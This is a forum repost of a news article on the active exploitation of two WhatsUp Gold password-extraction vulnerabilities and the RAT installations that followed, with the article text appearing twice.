Friend
Professional
- Messages
- 2,670
- Reaction score
- 884
- Points
- 113
Two vulnerabilities allow the extraction of encrypted passwords without authentication.
Hackers have begun to actively exploit two critical vulnerabilities in the popular WhatsUp Gold software developed by Progress Software. This solution is widely used to monitor network availability and performance in many organizations.
Vulnerabilities obtained with the identifiers CVE-2024-6670 and CVE-2024-6671 could allow attackers to extract encrypted passwords without authentication. In essence, they open a "back door" to systems that must be reliably protected.
The attacks began on August 30, despite the fact that Progress Software released patches on August 16. Many organizations have not yet been updated, which is what cybercriminals are taking advantage of. The discoverer of the vulnerabilities was researcher Sina Kheirkhakh. He discovered the problems on May 22 and reported them to the Zero Day Initiative. On August 30, Kheirkhach published a detailed technical description of the breaches, along with examples of exploits.
In his report, the researcher explains how insufficient user input validation allows arbitrary passwords to be inserted into admin account fields. This makes accounts vulnerable to takeover. Trend Micro reported that hackers began exploiting vulnerabilities almost immediately after the exploits were published. The first signs of attacks were recorded within five hours after the code appeared in the public domain.
The attackers exploit a legitimate WhatsUp Gold feature called Active Monitor PowerShell Script. With it, they run malicious PowerShell scripts through the NmPoller.exe executable, downloading them from remote URLs. Next, the attackers use the built-in Windows msiexec.exe utility to install various remote access tools (RATs). Among them are Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote. The injection of these RATs allows you to gain a foothold in the compromised systems for a long time.
In some cases, Trend Micro has observed the installation of multiple malicious programs at once. Analysts have not yet been able to attribute these attacks to a specific group, but the use of multiple RATs indicates the possible involvement of ransomware operators.
In a comment to BleepingComputer, Kheirkhach expressed the hope that his research and published exploits will eventually help improve software security in the future.
In 2024, this is not the first time that WhatsUp Gold has come under attack from publicly available exploits. In early August, the Shadowserver Foundation reported attempts to exploit CVE-2024-4885, a critical remote code execution bug disclosed on June 25. This vulnerability was also discovered by Kheirkhakh.
Experts urge all organizations using WhatsUp Gold to immediately install the latest security updates and check their systems for signs of compromise.
Source
Hackers have begun to actively exploit two critical vulnerabilities in the popular WhatsUp Gold software developed by Progress Software. This solution is widely used to monitor network availability and performance in many organizations.
Vulnerabilities obtained with the identifiers CVE-2024-6670 and CVE-2024-6671 could allow attackers to extract encrypted passwords without authentication. In essence, they open a "back door" to systems that must be reliably protected.
The attacks began on August 30, despite the fact that Progress Software released patches on August 16. Many organizations have not yet been updated, which is what cybercriminals are taking advantage of. The discoverer of the vulnerabilities was researcher Sina Kheirkhakh. He discovered the problems on May 22 and reported them to the Zero Day Initiative. On August 30, Kheirkhach published a detailed technical description of the breaches, along with examples of exploits.
In his report, the researcher explains how insufficient user input validation allows arbitrary passwords to be inserted into admin account fields. This makes accounts vulnerable to takeover. Trend Micro reported that hackers began exploiting vulnerabilities almost immediately after the exploits were published. The first signs of attacks were recorded within five hours after the code appeared in the public domain.
The attackers exploit a legitimate WhatsUp Gold feature called Active Monitor PowerShell Script. With it, they run malicious PowerShell scripts through the NmPoller.exe executable, downloading them from remote URLs. Next, the attackers use the built-in Windows msiexec.exe utility to install various remote access tools (RATs). Among them are Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote. The injection of these RATs allows you to gain a foothold in the compromised systems for a long time.
In some cases, Trend Micro has observed the installation of multiple malicious programs at once. Analysts have not yet been able to attribute these attacks to a specific group, but the use of multiple RATs indicates the possible involvement of ransomware operators.
In a comment to BleepingComputer, Kheirkhach expressed the hope that his research and published exploits will eventually help improve software security in the future.
In 2024, this is not the first time that WhatsUp Gold has come under attack from publicly available exploits. In early August, the Shadowserver Foundation reported attempts to exploit CVE-2024-4885, a critical remote code execution bug disclosed on June 25. This vulnerability was also discovered by Kheirkhakh.
Experts urge all organizations using WhatsUp Gold to immediately install the latest security updates and check their systems for signs of compromise.
Source
